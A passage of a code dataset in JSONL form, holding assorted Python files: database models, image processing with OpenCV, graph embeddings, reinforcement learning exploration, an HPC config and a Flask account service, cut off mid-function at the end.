'req_url': self.req_url,\n 'url': self.url,\n 'orig_createtime': self.orig_createtime,\n 'updated_dt': self.updated_dt,\n 'created_dt': self.created_dt\n }\n\n\n# class ParseRank(BaseModel):\n#\n# __tablename__ = 'parse_rank'\n#\n# id = Column(Integer, comment='自增id',primary_key=True, autoincrement=True)\n# name = Column(String(20), comment='名称',nullable=True)\n# author = Column(String(20), comment='作者', default='')\n\n\n\nBaseModel.metadata.create_all(engine)","sub_path":"models/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":4667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"195845761","text":"import igraph, copy\n\n# Determines whether the given igraph.Graph has a Gray Code\ndef GrayCode(graph):\n num_vertices = graph.vcount()#len(graph.neighbors())\n full_code = []\n first_code = [0 for i in range(0, num_vertices)]\n stack = []\n\n current_vertex = 0\n previous_code = None\n skip = 0\n\n num_required = 2**graph.vcount()\n num_generated = 0\n prev_cp = []\n while num_generated != num_required:\n new_code = []\n found = False\n # Each vertex neighboring the current, not including\n # vertexes we've already checked and that fail\n neighbors = graph.neighbors(current_vertex)\n neighbors.sort()\n for neighbor in neighbors[skip:]:#graph.neighbors(current_vertex).sort()[skip:]:\n\n #print (\"neighbor: \")\n # Not first code\n\n if previous_code != None:\n full_code = fc_cp\n #previous_code = prev_cp\n #print \"stack0\", stack\n new_code = GenerateGrayCode(previous_code, neighbor)\n previous_code = new_code\n # Unique?\n if new_code not in full_code:\n fc_cp = copy.deepcopy(full_code)\n fc_cp.append(new_code)\n num_generated += 1\n stack.append(fc_cp)\n #print \"stack 1\", stack\n current_vertex = neighbor\n found = True\n skip = 0\n break\n\n # First code\n else:\n fc_cp = copy.deepcopy(full_code)\n fc_cp.append(first_code)\n previous_code = first_code\n stack.append(fc_cp)\n found = True\n num_generated += 1\n break\n\n # No gray code exists\n if len(stack) == 0:\n return False\n\n # Backtrack\n if not found:\n num_generated -= 1\n full_code = stack.pop()\n skip = skip + 1\n\n # End of while loop, num_generated == num_required\n return True\n\n\ndef GenerateGrayCode(previous_code, neighbor):\n #print 'gen gray code'\n #print previous_code\n #print neighbor\n prev_cp = copy.deepcopy(previous_code)\n if prev_cp[neighbor] == 0:\n prev_cp[neighbor] = 1\n else:\n prev_cp[neighbor] = 0\n return prev_cp\n","sub_path":"gray_code.py","file_name":"gray_code.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"416428362","text":"import numpy as np\nimport cv2 as cv\n\ndef stereo_match(imgL, imgR):\n # disparity range is tuned for 'aloe' image pair\n window_size = 3\n min_disp = 16\n num_disp = 112-min_disp\n stereo = cv.StereoSGBM_create(minDisparity = min_disp,\n numDisparities = num_disp,\n blockSize = 16,\n P1 = 8*3*window_size**2,\n P2 = 32*3*window_size**2,\n disp12MaxDiff = 1,\n uniquenessRatio = 10,\n speckleWindowSize = 100,\n speckleRange = 32\n )\n\n print('computing disparity...')\n disp = stereo.compute(imgL, imgR).astype(np.float32) / 16.0\n\n cv.imshow('left', imgL)\n cv.imshow('disparity', (disp-min_disp)/num_disp)\n cv.waitKey(0)\n\n\nif __name__ == '__main__':\n base_path = 'opencv/data/'\n imgL = cv.imread(base_path + 'aloeL.jpg')\n imgR = cv.imread(base_path + 'aloeR.jpg')\n stereo_match(imgL, imgR)\n cv.destroyAllWindows()","sub_path":"opencv/study/6CameraCalibrationAnd3DReconstruction/4StereoImages.py","file_name":"4StereoImages.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"257288873","text":"import numpy as np\nimport datetime\nimport matplotlib.pyplot as plt\n\n\ndef prob_2_gs(h, R, Z, precision_voulue):\n temps_debut = datetime.datetime.now()\n\n # Constants\n M = R*h # nombre de quadrillés en r\n N = Z*h # nombre de qudrillés en h\n precision_voulue = precision_voulue\n\n # Création des array de potentiel\n V = np.zeros((M+1, N+1), float)\n Vprime = np.empty([M+1, N+1], float)\n\n # Définition des conditions frontières\n V[0:1*h, :] = 150 # 1 cm fois h pour le cylindre du centre\n V[-1, :] = 0 # extrémité du cylindre en r=10cm\n V[1*h:, 0], V[1*h:, -1] = 0, 0 # extrémités en z=0 et z=30 cm\n\n # Main loop\n delta = 1.0\n compteur = 0\n Vprime[:] = V\n print(\"h: \", h, \"M: \", M)\n while delta > precision_voulue:\n compteur += 1\n\n # Calcul des nouvelles valeurs de potentiel\n for i in range(M+1):\n for j in range(N+1):\n\n if i < 1*h or i == M or j == 0 or j == N: # si cond. frontières\n Vprime[i, j] = Vprime[i, j]\n\n else:\n Vprime[i, j] = 1/4*(h/(2*i*h)*(Vprime[i+1, j]-Vprime[i-1, j])\n + Vprime[i+1, j] + Vprime[i-1, j] + Vprime[i, j+1] + Vprime[i, j-1])\n\n # Calcul le max de différence entre nouvelles et vieilles valeurs\n delta = np.max(abs(V-Vprime))\n #print(\"compteur: \", compteur, \"delta: \", delta)\n\n # On échange les deux array pour recommencer\n V[:] = Vprime[:]\n\n # Make a plot\n temps_fin = datetime.datetime.now()\n delta_temps = temps_fin - temps_debut\n print(\"Temps d'éxécution: \", \"{}.{} s\".format(delta_temps.seconds, delta_temps.microseconds))\n print(\"nombre d'itération: \", compteur, \" itérations\")\n plt.figure(figsize=(9, 6))\n plt.imshow(Vprime, cmap=\"viridis\")\n plt.title(\"Potentiel du problème 2 avec h={} et une précision de {} V\".format(h, precision_voulue))\n plt.axis()\n plt.colorbar()\n plt.show()\n\n\nprob_2_gs(10, 10, 30, 1e-3)\n","sub_path":"No2/No2_ci.py","file_name":"No2_ci.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"281659771","text":"# -*- coding: utf-8 -*-\nimport cv2\nimport numpy as np\nimport os\n\ndef LBP(image):\n W, H = image.shape #获得图像长宽\n xx = [-1, 0, 1, 1, 1, 0, -1, -1]\n yy = [-1, -1, -1, 0, 1, 1, 1, 0] #xx, yy 主要作用对应顺时针旋转时,相对中点的相对值.\n res = np.zeros((W - 2, H - 2),dtype=\"uint8\") #创建0数组,显而易见维度原始图像的长宽分别减去2,并且类型一定的是uint8,无符号8位,opencv图片的存储格式.\n for i in range(1, W - 2):\n for j in range(1, H - 2):\n temp = \"\"\n for m in range(8):\n Xtemp = xx[m] + i\n Ytemp = yy[m] + j #分别获得对应坐标点\n if image[Xtemp, Ytemp] > image[i, j]: #像素比较\n temp = temp + '1'\n else:\n temp = temp + '0'\n #print int(temp, 2)\n res[i - 1][j - 1] = int(temp, 2) # 写入结果中\n return res\n\ni=0\npath=r'E:\\dataset\\nonjiaoyu\\aug_yuanshi\\ck+\\train'\nout_path=r'E:\\dataset\\nonjiaoyu\\augAGE\\LBP\\ck+\\train'\ndir_list=os.listdir(path)\nfor list in dir_list:\n if list == 'angry':\n f = os.path.join(path,list)\n o = os.path.join(out_path,list)\n elif list == 'contempt':\n f = os.path.join(path, list)\n o = os.path.join(out_path, list)\n elif list == 'disgust':\n f = os.path.join(path, list)\n o = os.path.join(out_path, list)\n elif list == 'fear':\n f = os.path.join(path, list)\n o = os.path.join(out_path, list)\n elif list == 'happy':\n f = os.path.join(path, list)\n o = os.path.join(out_path, list)\n elif list == 'neutral':\n f = os.path.join(path, list)\n o = os.path.join(out_path, list)\n elif list == 'sad':\n f = os.path.join(path, list)\n o = os.path.join(out_path, list)\n elif list == 'surprise':\n f = os.path.join(path, list)\n o = os.path.join(out_path, list)\n else:\n print(\"get error.......\\n\")\n break\n fs = os.listdir(f)\n for f1 in fs:\n tmp_path = os.path.join(f, f1)\n if not os.path.isdir(tmp_path):\n frame = cv2.imread(tmp_path,0)\n #gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n #frame = cv2.resize(gray, (227, 227))\n dst=LBP(frame)\n #dst = cv2.resize(dst, (227, 227))\n writ_path=os.path.join(o,f1)\n cv2.imwrite(writ_path,dst)\n i=i+1\n print(i)","sub_path":"LBP转化.py","file_name":"LBP转化.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"212833349","text":"#coding=utf-8\n\nimport datetime\nfrom config import consts\nfrom utils import html_util\nfrom config.log_setting import logger \n\nclass NewsItem(object):\n\n def __init__(self,\n title='',\n url='',\n description=None, # es中无法查询空字符串\"\",所以如果为空,那么直接写None\n pubdate='',\n symbol='',\n fromsite='未知',\n insertdate=datetime.datetime.now().strftime(consts.DATE_FORMAT),\n origin_fromsite='',\n content=None,\n author=None,\n keywords=None,\n favorite_num=-1, #-1表示无该字段\n comment_num=-1,\n agree_num=-1,\n disagree_num=-1,\n ):\n self.title = title\n self.url = url\n\n #摘要,如果没有则取content字段的50个字\n logger.info(\"content:%s, description:%s\" % (content, description))\n if (description is None or description == '') and (content is not None and len(content) > 0):\n logger.info('change content to description')\n self.description = (html_util.strip_tags(content))[:100]\n else:\n self.description = self.norm(description)\n\n self.pubdate = pubdate #新闻发布时间 格式:yyyy-mm-dd HH:MM:SS, 见config.consts.DATE_FORMAT\n self.symbol = symbol\n self.fromsite = fromsite # 抓取站点\n self.insertdate = insertdate #抓取时间\n self.origin_fromsite = self.norm(origin_fromsite) # 实际新闻所属站点\n self.content = self.norm(content) #正文\n self.author = self.norm(author) #作者\n self.keywords = self.norm(keywords) #新闻关键词\n self.favorite_num=favorite_num\n self.comment_num=comment_num\n self.agree_num=agree_num\n self.disagree_num=disagree_num\n\n def norm(self,field):\n if field == \"\":\n return None\n return field\n\n def _asdict(self):\n '''\n 1. for python object json serialize\n 2. gen out a python dict obj\n '''\n return self.__dict__\n\ndef default(o):\n '''\n for python object json serialize\n example: json.dumps(crawl_tonghuashun('baba'), default=default)\n '''\n\n return o._asdict()\n","sub_path":"news_crawler/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"131697818","text":"#!/usr/bin/python3\n\n\"\"\" \n this is the code to accompany the Lesson 2 (SVM) mini-project\n\n use an SVM to identify emails from the Enron corpus by their authors\n \n Sara has label 0\n Chris has label 1\n\n\"\"\"\n \nimport sys\nfrom time import time\nsys.path.append(\"../tools/\")\nfrom email_preprocess import preprocess\nfrom sklearn.svm import SVC\nfrom collections import Counter\n\n\n### features_train and features_test are the features for the training\n### and testing datasets, respectively\n### labels_train and labels_test are the corresponding item labels\nfeatures_train, features_test, labels_train, labels_test = preprocess()\n\n#########################################################\n### your code goes here ###\n\n#portion used to make the dataset smaller\n#features_train = features_train[:len(features_train)//100]\n#labels_train = labels_train[:len(labels_train)//100]\n\nclf = SVC(kernel=\"rbf\", C=10000.0, gamma=\"auto\")\ntime0 = time()\nclf.fit(features_train, labels_train)\nprint (\"Training time: \" + str(round(time()-time0, 2)) + \"s\")\n\nprint(\"accuracy:\")\naccuracy = clf.score(features_test, labels_test)\nprint(accuracy)\n\npred = clf.predict(features_test)\nprint(\"element 10, 26, 50: \\n\")\nelements = [str(pred[10]), str(pred[26]), str(pred[50])]\nprint(\"\\n\".join(elements))\n\n#Find the amount classified as chris:\nprint(Counter(pred)[1])\nprint(Counter(pred)[0])\n\n\n\n\n#########################################################\n\n\n","sub_path":"svm/svm_author_id.py","file_name":"svm_author_id.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"121102925","text":"from parsl.addresses import address_by_hostname\nfrom parsl.launchers import AprunLauncher\nfrom parsl.providers import TorqueProvider\n\nfrom funcx_endpoint.endpoint.utils.config import Config\nfrom funcx_endpoint.executors import HighThroughputExecutor\n\n# fmt: off\n\n# PLEASE UPDATE user_opts BEFORE USE\nuser_opts = {\n 'bluewaters': {\n 'worker_init': 'module load bwpy;source anaconda3/etc/profile.d/conda.sh;conda activate funcx_testing_py3.7',\n 'scheduler_options': '',\n }\n}\n\nconfig = Config(\n executors=[\n HighThroughputExecutor(\n max_workers_per_node=1,\n worker_debug=False,\n address=address_by_hostname(),\n provider=TorqueProvider(\n queue='normal',\n launcher=AprunLauncher(overrides=\"-b -- bwpy-environ --\"),\n\n # string to prepend to #SBATCH blocks in the submit\n scheduler_options=user_opts['bluewaters']['scheduler_options'],\n\n # Command to be run before starting a worker, such as:\n # 'module load bwpy; source activate funcx env'.\n worker_init=user_opts['bluewaters']['worker_init'],\n\n # Scale between 0-1 blocks with 2 nodes per block\n nodes_per_block=2,\n init_blocks=0,\n min_blocks=0,\n max_blocks=1,\n\n # Hold blocks for 30 minutes\n walltime='00:30:00'\n ),\n )\n\n ],\n)\n\n# fmt: on\n","sub_path":"docs/configs/bluewaters.py","file_name":"bluewaters.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"514031984","text":"\"\"\"\nImplementation of heterogeneous node2vec algorithm.\nBased on the reference implementation of node2vec by Aditya Grover\nand adapted from code at https://github.com/aditya-grover/node2vec\n\"\"\"\n\nimport argparse\nimport networkx as nx\nfrom gensim.models import Word2Vec\nimport n2v\nimport os\nimport logging\nlog = logging.getLogger(\"n2v.log\")\n\nhandler = logging.handlers.WatchedFileHandler(\n os.environ.get(\"LOGFILE\", \"n2v.log\"))\nformatter = logging.Formatter('%(asctime)s - %(levelname)s -%(filename)s:%(lineno)d - %(message)s')\nhandler.setFormatter(formatter)\nlog = logging.getLogger()\nlog.setLevel(logging.INFO)\nlog.addHandler(handler)\nlog.addHandler(logging.StreamHandler())\n\n\ndef parse_args():\n\t\"\"\"\n\tparse args of node2vec\n\t\"\"\"\n\tparser = argparse.ArgumentParser(description=\"Run node2vec.\")\n\n\tparser.add_argument('--input', nargs='?', default='graph/karate.train', help='Input graph path')\n\n\tparser.add_argument('--output', nargs='?', default='emb/karate.emb', help='Embeddings path')\n\n\tparser.add_argument('--dimensions', type=int, default=128, help = 'Number of dimensions. Default is 128.')\n\n\tparser.add_argument('--walk-length', type=int, default=80, help='Length of walk per source. Default is 80.')\n\n\tparser.add_argument('--num-walks', type=int, default=10, help='Number of walks per source. Default is 10.')\n\n\tparser.add_argument('--window-size', type=int, default=10, help='Context size for optimization. Default is 10.')\n\n\tparser.add_argument('--iter', default=1, type=int, help='Number of epochs in SGD')\n\n\tparser.add_argument('--workers', type=int, default=8, help='Number of parallel workers. Default is 8.')\n\n\tparser.add_argument('--p', type=float, default=1, help='Return hyperparameter. Default is 1.')\n\n\tparser.add_argument('--q', type=float, default=1, help='Inout hyperparameter. Default is 1.')\n\n\tparser.add_argument('--gamma', type=float, default=1, help='Inout hyperparameter. Default is 1.')\n\n\tparser.add_argument('--weighted', dest='weighted', action='store_true',\n\t\t\t\t\t\thelp='Boolean specifying (un)weighted. Default is unweighted.')\n\tparser.add_argument('--unweighted', dest='unweighted', action='store_false')\n\tparser.set_defaults(weighted=False)\n\n\tparser.add_argument('--directed', dest='directed', action='store_true',\n\t\t\t\t\t\thelp='Graph is (un)directed. Default is undirected.')\n\tparser.add_argument('--undirected', dest='undirected', action='store_false')\n\tparser.set_defaults(directed=False)\n\n\treturn parser.parse_args()\n\ndef output_args_to_logger(args):\n\tlog.info(\"Input: {}\".format(args.input))\n\tlog.info(\"output: {}\".format(args.output))\n\tlog.info(\"weighted: {}\".format(args.weighted))\n\n\ndef read_graph():\n\t\"\"\"\n\tReads the input network in networkx.\n\t\"\"\"\n\tif args.weighted:\n\t\tg = nx.read_edgelist(args.input, nodetype=str, data=(('weight', float),), create_using=nx.DiGraph())\n\telse:\n\t\tg = nx.read_edgelist(args.input, nodetype=str, create_using=nx.DiGraph())\n\t\tfor edge in g.edges():\n\t\t\tg[edge[0]][edge[1]]['weight'] = 1\n\n\tif not args.directed:\n\t\tg = g.to_undirected()\n\n\treturn g\n\n\ndef learn_embeddings(walks):\n\t\"\"\"\n\tLearn embeddings by optimizing the Skipgram objective using SGD.\n\t\"\"\"\n\twalks = [map(str, walk) for walk in walks]\n\tmodel = Word2Vec(walks, size=args.dimensions, window=args.window_size, min_count=0, sg=1, workers=args.workers,\n\t\t\t\t\titer=args.iter)\n\n\t#model.wv.save_word2vec_format(args.output)# TODO:python 3 and more?\n\tmodel.save_word2vec_format(args.output) #python 2.7\n\treturn\n\n\ndef main(args):\n\t\"\"\"\n\tPipeline for representational learning for all nodes in a graph.\n\t\"\"\"\n\tnx_g = read_graph()\n\tlog.debug(\"Extracted graph with {}\".format(nx_g))\n\tg = n2v.hetnode2vec.Graph(nx_g, args.directed, args.p, args.q, args.gamma, True) # gamma is a parameter when we traverse\n\t# from one nodetype to another nodetype. Change True to False if you don't want to use the modified get-alias_adgen2v\n\tlog.info(\"Done: preprocess transition probabilities \")\n\twalks = g.simulate_walks(args.num_walks, args.walk_length)\n\tlearn_embeddings(walks)\n\n\nif __name__ == \"__main__\":\n\tlog.debug(\"starting execution of run_n2v.py\")\n\targs = parse_args()\n\toutput_args_to_logger(args)\n\tmain(args)\n","sub_path":"create_hn2v_embedding.py","file_name":"create_hn2v_embedding.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"546288068","text":"from http import MediaType\n\ndef renderer(format, mimetypes=(), priority=0, name=None):\n \"\"\"\n Decorates a view method to say that it renders a particular format and mimetypes.\n\n Use as:\n @renderer(format=\"foo\")\n def render_foo(self, request, context, template_name): ...\n or\n @renderer(format=\"foo\", mimetypes=(\"application/x-foo\",))\n def render_foo(self, request, context, template_name): ...\n \n The former case will inherit mimetypes from the previous renderer for that\n format in the MRO. Where there isn't one, it will default to the empty\n tuple.\n\n Takes an optional priority argument to resolve ties between renderers.\n \"\"\"\n\n def g(f):\n f.is_renderer = True\n f.format = format\n f.mimetypes = set(MediaType(mimetype, priority) for mimetype in mimetypes)\n f.name = name\n f.priority = priority\n return f\n return g","sub_path":"django_conneg/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"53880135","text":"from gym.spaces import Discrete, Space\nfrom typing import Optional, Tuple, Union\n\nfrom ray.rllib.models.action_dist import ActionDistribution\nfrom ray.rllib.models.catalog import ModelCatalog\nfrom ray.rllib.models.modelv2 import ModelV2\nfrom ray.rllib.models.torch.misc import SlimFC\nfrom ray.rllib.models.torch.torch_action_dist import TorchCategorical\nfrom ray.rllib.policy.sample_batch import SampleBatch\nfrom ray.rllib.utils.annotations import override\nfrom ray.rllib.utils.exploration.exploration import Exploration\nfrom ray.rllib.utils.framework import try_import_torch, TensorType\nfrom ray.rllib.utils.from_config import from_config\nfrom ray.rllib.utils.typing import FromConfigSpec, ModelConfigDict, \\\n SampleBatchType\n\ntorch, nn = try_import_torch()\nF = None\nif nn is not None:\n F = nn.functional\n\n\nclass Curiosity(Exploration):\n \"\"\"Implementation of:\n [1] Curiosity-driven Exploration by Self-supervised Prediction\n Pathak, Agrawal, Efros, and Darrell - UC Berkeley - ICML 2017.\n https://arxiv.org/pdf/1705.05363.pdf\n\n Learns a simplified model of the environment based on three networks:\n 1) Embedding observations into latent space (\"feature\" network).\n 2) Predicting the action, given two consecutive embedded observations\n (\"inverse\" network).\n 3) Predicting the next embedded obs, given an obs and action\n (\"forward\" network).\n\n The less the agent is able to predict the actually observed next feature\n vector, given obs and action (through the forwards network), the larger the\n \"intrinsic reward\", which will be added to the extrinsic reward.\n Therefore, if a state transition was unexpected, the agent becomes\n \"curious\" and will further explore this transition leading to better\n exploration in sparse rewards environments.\n \"\"\"\n\n def __init__(self,\n action_space: Space,\n *,\n framework: str,\n model: ModelV2,\n feature_dim: int = 288,\n feature_net_config: Optional[ModelConfigDict] = None,\n inverse_net_hiddens: Tuple[int] = (256, ),\n inverse_net_activation: str = \"relu\",\n forward_net_hiddens: Tuple[int] = (256, ),\n forward_net_activation: str = \"relu\",\n beta: float = 0.2,\n eta: float = 1.0,\n lr: float = 1e-3,\n sub_exploration: Optional[FromConfigSpec] = None,\n **kwargs):\n \"\"\"Initializes a Curiosity object.\n\n Uses as defaults the hyperparameters described in [1].\n\n Args:\n feature_dim (int): The dimensionality of the feature (phi)\n vectors.\n feature_net_config (Optional[ModelConfigDict]): Optional model\n configuration for the feature network, producing feature\n vectors (phi) from observations. This can be used to configure\n fcnet- or conv_net setups to properly process any observation\n space.\n inverse_net_hiddens (Tuple[int]): Tuple of the layer sizes of the\n inverse (action predicting) NN head (on top of the feature\n outputs for phi and phi').\n inverse_net_activation (str): Activation specifier for the inverse\n net.\n forward_net_hiddens (Tuple[int]): Tuple of the layer sizes of the\n forward (phi' predicting) NN head.\n forward_net_activation (str): Activation specifier for the forward\n net.\n beta (float): Weight for the forward loss (over the inverse loss,\n which gets weight=1.0-beta) in the common loss term.\n eta (float): Weight for intrinsic rewards before being added to\n extrinsic ones.\n lr (float): The learning rate for the curiosity-specific\n optimizer, optimizing feature-, inverse-, and forward nets.\n sub_exploration (Optional[FromConfigSpec]): The config dict for\n the underlying Exploration to use (e.g. epsilon-greedy for\n DQN). If None, uses the FromSpecDict provided in the Policy's\n default config.\n \"\"\"\n if framework != \"torch\":\n raise ValueError(\"Only torch is currently supported for Curiosity\")\n elif not isinstance(action_space, Discrete):\n raise ValueError(\n \"Only Discrete action spaces supported for Curiosity so far.\")\n\n super().__init__(\n action_space, model=model, framework=framework, **kwargs)\n\n self.feature_dim = feature_dim\n if feature_net_config is None:\n feature_net_config = self.policy_config[\"model\"].copy()\n self.feature_net_config = feature_net_config\n self.inverse_net_hiddens = inverse_net_hiddens\n self.inverse_net_activation = inverse_net_activation\n self.forward_net_hiddens = forward_net_hiddens\n self.forward_net_activation = forward_net_activation\n\n self.beta = beta\n self.eta = eta\n self.lr = lr\n # TODO: (sven) if sub_exploration is None, use Trainer's default\n # Exploration config.\n if sub_exploration is None:\n raise NotImplementedError\n self.sub_exploration = sub_exploration\n\n # Creates modules/layers inside the actual ModelV2.\n self._curiosity_feature_net = ModelCatalog.get_model_v2(\n self.model.obs_space,\n self.action_space,\n self.feature_dim,\n model_config=self.feature_net_config,\n framework=self.framework,\n name=\"feature_net\",\n )\n\n self._curiosity_inverse_fcnet = self._create_fc_net(\n [2 * self.feature_dim] + list(self.inverse_net_hiddens) +\n [self.action_space.n], self.inverse_net_activation)\n\n self._curiosity_forward_fcnet = self._create_fc_net(\n [self.feature_dim + self.action_space.n\n ] + list(forward_net_hiddens) + [self.feature_dim],\n self.forward_net_activation)\n\n # This is only used to select the correct action\n self.exploration_submodule = from_config(\n cls=Exploration,\n config=self.sub_exploration,\n action_space=self.action_space,\n framework=self.framework,\n policy_config=self.policy_config,\n model=self.model,\n num_workers=self.num_workers,\n worker_index=self.worker_index,\n )\n\n @override(Exploration)\n def get_exploration_action(self,\n *,\n action_distribution: ActionDistribution,\n timestep: Union[int, TensorType],\n explore: bool = True):\n # Simply delegate to sub-Exploration module.\n return self.exploration_submodule.get_exploration_action(\n action_distribution=action_distribution,\n timestep=timestep,\n explore=explore)\n\n @override(Exploration)\n def get_exploration_optimizer(self, optimizers):\n feature_params = list(self._curiosity_feature_net.parameters())\n inverse_params = list(self._curiosity_inverse_fcnet.parameters())\n forward_params = list(self._curiosity_forward_fcnet.parameters())\n\n # Now that the Policy's own optimizer(s) have been created (from\n # the Model parameters (IMPORTANT: w/o(!) the curiosity params),\n # we can add our curiosity sub-modules to the Policy's Model.\n self.model._curiosity_feature_net = \\\n self._curiosity_feature_net.to(self.device)\n self.model._curiosity_inverse_fcnet = \\\n self._curiosity_inverse_fcnet.to(self.device)\n self.model._curiosity_forward_fcnet = \\\n self._curiosity_forward_fcnet.to(self.device)\n\n # Add the Adam for curiosity NN updating to the Policy's optimizers.\n return optimizers + [\n torch.optim.Adam(\n forward_params + inverse_params + feature_params, lr=self.lr)\n ]\n\n @override(Exploration)\n def postprocess_trajectory(self, policy, sample_batch, tf_sess=None):\n \"\"\"Calculates phi values (obs, obs', and predicted obs') and ri.\n\n Stores calculated phi, phi' and predicted phi' as well as the intrinsic\n rewards in the batch for loss processing by the policy.\n \"\"\"\n batch_size = sample_batch[SampleBatch.OBS].shape[0]\n phis, _ = self.model._curiosity_feature_net({\n SampleBatch.OBS: torch.cat([\n torch.from_numpy(sample_batch[SampleBatch.OBS]),\n torch.from_numpy(sample_batch[SampleBatch.NEXT_OBS])\n ])\n })\n phi, next_phi = phis[:batch_size], phis[batch_size:]\n\n # Detach phi from graph (should not backpropagate through feature net\n # for forward-loss).\n predicted_next_phi = self.model._curiosity_forward_fcnet(\n torch.cat(\n [\n phi.detach(),\n F.one_hot(\n torch.from_numpy(\n sample_batch[SampleBatch.ACTIONS]).long(),\n num_classes=self.action_space.n).float()\n ],\n dim=-1))\n\n # Forward loss term (predicted phi', given phi and action vs actually\n # observed phi').\n forward_l2_norm_sqared = 0.5 * torch.sum(\n torch.pow(predicted_next_phi - next_phi, 2.0), dim=-1)\n # Scale forward loss by eta hyper-parameter.\n sample_batch[SampleBatch.REWARDS] = \\\n sample_batch[SampleBatch.REWARDS] + \\\n self.eta * forward_l2_norm_sqared.detach().cpu().numpy()\n return sample_batch\n\n @override(Exploration)\n def get_exploration_loss(self, policy_loss, train_batch: SampleBatchType):\n \"\"\"Adds the loss for the inverse and forward models to policy_loss.\n \"\"\"\n batch_size = train_batch[SampleBatch.OBS].shape[0]\n phis, _ = self.model._curiosity_feature_net({\n SampleBatch.OBS: torch.cat(\n [\n train_batch[SampleBatch.OBS],\n train_batch[SampleBatch.NEXT_OBS]\n ],\n dim=0)\n })\n phi, next_phi = phis[:batch_size], phis[batch_size:]\n # Inverse loss term (prediced action that led from phi to phi' vs\n # actual action taken).\n phi_next_phi = torch.cat([phi, next_phi], dim=-1)\n dist_inputs = self.model._curiosity_inverse_fcnet(phi_next_phi)\n action_dist = TorchCategorical(dist_inputs, self.model)\n # Neg log(p); p=probability of observed action given the inverse-NN\n # predicted action distribution.\n inverse_loss = -action_dist.logp(train_batch[SampleBatch.ACTIONS])\n inverse_loss = torch.mean(inverse_loss)\n\n # Forward loss term has already been calculated during train batch pre-\n # processing (just have to weight with beta here).\n predicted_next_phi = self.model._curiosity_forward_fcnet(\n torch.cat(\n [\n phi,\n F.one_hot(\n train_batch[SampleBatch.ACTIONS].long(),\n num_classes=self.action_space.n).float()\n ],\n dim=-1))\n forward_loss = torch.mean(0.5 * torch.sum(\n torch.pow(predicted_next_phi - next_phi, 2.0), dim=-1))\n\n # Append our loss to the policy loss(es).\n return policy_loss + [\n (1.0 - self.beta) * inverse_loss + self.beta * forward_loss\n ]\n\n def _create_fc_net(self, layer_dims, activation):\n \"\"\"Given a list of layer dimensions (incl. input-dim), creates FC-net.\n\n Args:\n layer_dims (Tuple[int]): Tuple of layer dims, including the input\n dimension.\n activation (str): An activation specifier string (e.g. \"relu\").\n\n\n Examples:\n If layer_dims is [4,8,6] we'll have a two layer net: 4->8 and 8->6.\n \"\"\"\n layers = []\n for i in range(len(layer_dims) - 1):\n act = activation if i < len(layer_dims) - 2 else None\n layers.append(\n SlimFC(\n in_size=layer_dims[i],\n out_size=layer_dims[i + 1],\n activation_fn=act))\n return nn.Sequential(*layers)\n","sub_path":"rllib/utils/exploration/curiosity.py","file_name":"curiosity.py","file_ext":"py","file_size_in_byte":12491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"325977027","text":"from datetime import datetime\nfrom flask_jwt_extended import get_jwt_identity\nfrom flask_smorest import abort\n\nfrom app.main import db\nfrom app.main.service.generic_service import GenericService\nfrom app.main.model.account_model import Account\n\n\nclass AccountService(GenericService):\n\n @classmethod\n def read_all(cls):\n \"\"\"\n Read all accounts.\n\n Returns:\n List of accounts.\n \"\"\"\n return Account.query.all()\n\n @classmethod\n def read_all_by_user(cls, data):\n \"\"\"\n Read all accounts of a user.\n\n Params:\n data - deserialized request data (Immutable dict)\n\n Returns:\n List of accounts of the user.\n \"\"\"\n super().validate_user_permission_on_input(data, 'user_id')\n\n return Account.query.filter(Account.user_id == data['user_id']).all()\n\n @classmethod\n def create(cls, data):\n \"\"\"\n Create a new account.\n\n Params:\n data - deserialized request data (Immutable dict)\n\n Returns:\n Created account.\n \"\"\"\n account = Account.query.filter((Account.user_id == get_jwt_identity()) & (Account.name == data['name'])).first()\n\n if not account:\n new_account = Account(**data)\n new_account.user_id = get_jwt_identity()\n new_account.setup_date = new_account.last_update = datetime.utcnow()\n\n db.session.add(new_account)\n db.session.commit()\n\n return new_account\n else:\n abort(409, msg='Account already exists.')\n\n @classmethod\n def update(cls, data, id):\n \"\"\"\n Update an account by id.\n\n Params:\n id - id of account to update\n data - deserialized request data (Immutable dict)\n\n Returns:\n Updated account.\n \"\"\"\n print(data)\n account = Account.query.filter(Account.id == id).first()\n\n super().validate_user_permission_on_result(account, Account, 'user_id')\n\n for k, v in data.items():\n setattr(account, k, v)\n account.last_update = datetime.utcnow()\n\n db.session.add(account)\n db.session.commit()\n\n return account\n\n @classmethod\n def read(cls, id):\n \"\"\"\n Read an account by id.\n\n Params:\n id - id of account to get from database\n\n Returns:\n Retrieved account.\n \"\"\"\n account = Account.query.filter(Account.id == id).first()\n\n super().validate_user_permission_on_result(account, Account, 'user_id')\n\n return account\n\n @classmethod\n def delete(cls, id):\n \"\"\"\n Delete an account by id.\n\n Params:\n id - id of account to delete from database\n\n Returns:\n Deleted account.\n \"\"\"\n account = 